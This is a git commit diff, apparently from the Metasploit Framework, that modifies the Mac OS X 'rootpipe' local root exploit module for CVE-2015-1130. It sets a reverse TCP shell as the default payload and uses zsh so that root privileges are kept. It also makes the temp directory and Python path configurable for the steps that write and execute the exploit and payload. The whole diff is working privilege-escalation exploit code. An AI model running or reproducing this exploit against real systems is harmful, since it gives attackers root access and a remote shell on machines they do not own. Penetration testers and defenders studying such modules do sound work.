Use zsh to avoid dropping privs

wvu · wvu · commit a7601c1b9acf · 2015-04-10T11:22:00.000-05:00
Also add some configurable options.
diff --git a/modules/exploits/osx/local/rootpipe.rb b/modules/exploits/osx/local/rootpipe.rb
@@ -42,8 +42,17 @@ def initialize(info = {})
       'Targets' => [
         ['Mac OS X 10.9-10.10.2 x64 (Native Payload)', {}]
       ],
-      'DefaultTarget' => 0
+      'DefaultTarget' => 0,
+      'DefaultOptions' => {
+        'PAYLOAD' => 'osx/x64/shell_reverse_tcp',
+        'CMD' => '/bin/zsh'
+      }
     ))
+
+    register_options([
+      OptString.new('TMPDIR', [true, 'Path to temp directory', '/tmp']),
+      OptString.new('PYTHON', [true, 'Path to Python', '/usr/bin/python'])
+    ])
   end
 
   def check
@@ -58,8 +67,8 @@ def exploit
     exploit_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1130')
     python_exploit = File.read(File.join(exploit_path, 'exploit.py'))
     binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
-    exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
-    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+    exploit_file = "#{datastore['TMPDIR']}/#{Rex::Text::rand_text_alpha_lower(12)}"
+    payload_file = "#{datastore['TMPDIR']}/#{Rex::Text::rand_text_alpha_lower(12)}"
 
     print_status("Writing exploit file as '#{exploit_file}'")
     write_file(exploit_file, python_exploit)
@@ -70,7 +79,7 @@ def exploit
     register_file_for_cleanup(payload_file)
 
     print_status('Executing payload...')
-    cmd_exec("python #{exploit_file} #{payload_file} #{payload_file}")
+    cmd_exec("#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}")
     cmd_exec(payload_file)
   end
 
